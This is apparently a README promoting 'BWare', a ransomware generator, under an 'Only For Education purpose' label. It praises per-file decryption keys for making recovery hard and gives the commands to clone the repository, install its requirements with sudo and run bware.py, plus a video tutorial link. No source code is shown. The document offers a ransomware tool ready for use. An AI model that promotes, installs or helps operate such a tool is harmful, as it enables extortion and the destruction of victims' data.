A ransomware generator
Only For Education purpose
Features (V2) :-
+ Decryption key will be diffrrent for every file
{So if some1 found x1.txt file's decryption key they can't decrypt other files with same key and finding out even one file's decryption key takes a lot of time :)}
Commands :-
~ ❯❯❯ git clone https://github.com/back-2-hack/BWare.git
~ ❯❯❯ cd BWare
~/BWare ❯❯❯ sudo pip3 install -r requirements.txt
~/BWare ❯❯❯ python3 bware.py
Video tutorial { https://www.youtube.com/watch?v=wYWnZ8ySrtg }